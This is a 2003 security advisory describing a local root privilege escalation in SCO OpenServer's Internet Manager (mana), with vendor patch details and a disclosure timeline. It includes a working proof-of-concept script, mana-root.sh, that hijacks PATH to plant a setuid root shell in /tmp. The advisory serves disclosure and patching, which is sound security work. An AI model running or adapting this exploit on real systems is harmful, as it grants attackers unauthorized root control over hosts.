-----------------------------------------------------------------------
Texonet Security Advisory 20030902
-----------------------------------------------------------------------
Advisory ID    : TEXONET-20030902
Authors        : Joel Soderberg and Christer Oberg
Issue date     : Tuesday, September 02, 2003
Publish date   : Monday, September 15, 2003
Application    : SCO OpenServer / Internet Manager (mana)
Version(s)     : 5.0.5 - 5.0.7
Platforms      : OpenServer
Availability   : https://www.texonet.com/advisories/TEXONET-20030902.txt
-----------------------------------------------------------------------


Problem:
-----------------------------------------------------------------------
A vulnerability in SCO Internet Manager (mana) program for OpenServer
(SCO Unix) that lets local users gain root level privileges.


Description:
-----------------------------------------------------------------------
Short description from SCO: "SCO Internet Manager - allowing users to
easily configure and manage Internet and intranet servers."

The SCO Internet Manager (mana) is designed to be run via the 
ncsa_httpd on port 615 and it is password protected.

Running /usr/internet/admin/mana/mana locally is however possible.

By exporting the environment variable REMOTE_ADDR and setting it to
127.0.0.1 mana is tricked to execute the file menu.mana as if it was 
run via the nsca_httpd password protected area.

An other interesting environment variable is PATH_INFO which tells mana
what .mana file should be run.

The file pass-err.mana contains the following lines:

  <TCL>
  if {[catch {exec hostname} hostName] != 0} {
      set hostName localhost
  }
  set mana(localHostName) $hostName
  return {}
  </TCL>

This tells us that mana will execute "hostname" when this file is run.

By changing the environment variables PATH_INFO to /pass-err.mana and
PATH to ./:$PATH would make mana execute ./hostname with root
privileges.


Example (Simple POC):

This proof of concept for OpenServer 5.0.7 should give any local user
euid=0(root).


$ uname -a
SCO_SV openserv 3.2 5.0.7 i386
$ id
uid=200(test) gid=50(group) groups=50(group)
$ sh mana-root.sh
# id
uid=200(test) gid=50(group) euid=0(root) groups=50(group)


- Code Start -
mana-root.sh
----------------------------C-U-T---H-E-R-E----------------------------
#!/bin/sh
#
# OpenServer 5.0.7 - Local mana root shell
#
#

REMOTE_ADDR=127.0.0.1
PATH_INFO=/pass-err.mana
PATH=./:$PATH

export REMOTE_ADDR
export PATH_INFO
export PATH

echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

chmod 755 hostname

/usr/internet/admin/mana/mana > /dev/null

/tmp/sh

----------------------------C-U-T---H-E-R-E----------------------------
- Code End –


Workaround:
-----------------------------------------------------------------------
The proper solution is to install the latest packages.

Location of Fixed Binaries

ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19


Verification

MD5 (VOL.000.000) = 37b55df2c9000c703a22baafbe9cef42

md5 is available for download from ftp://ftp.sco.com/pub/security/tools


Installing Fixed Binaries

Upgrade the affected binaries with the following sequence:

1) Download the VOL* files to the /tmp directory

2) Run the custom command, specify an install from media images, and 
   specify the /tmp directory as the location of the images.


Disclosure Timeline:
-----------------------------------------------------------------------
9/02/2003: Vendor notified by e-mail
9/03/2003: Vendor has verified the issue and is working on the solution
9/15/2003: Public release


About Texonet:
-----------------------------------------------------------------------
Texonet is a Swedish based security company with a focus on penetration
testing / security assessments, research and development.


Contacting Texonet:
-----------------------------------------------------------------------
E-mail:    advisories(-at-)texonet.com
Homepage:  https://www.texonet.com/
Phone:     +46-8-55174611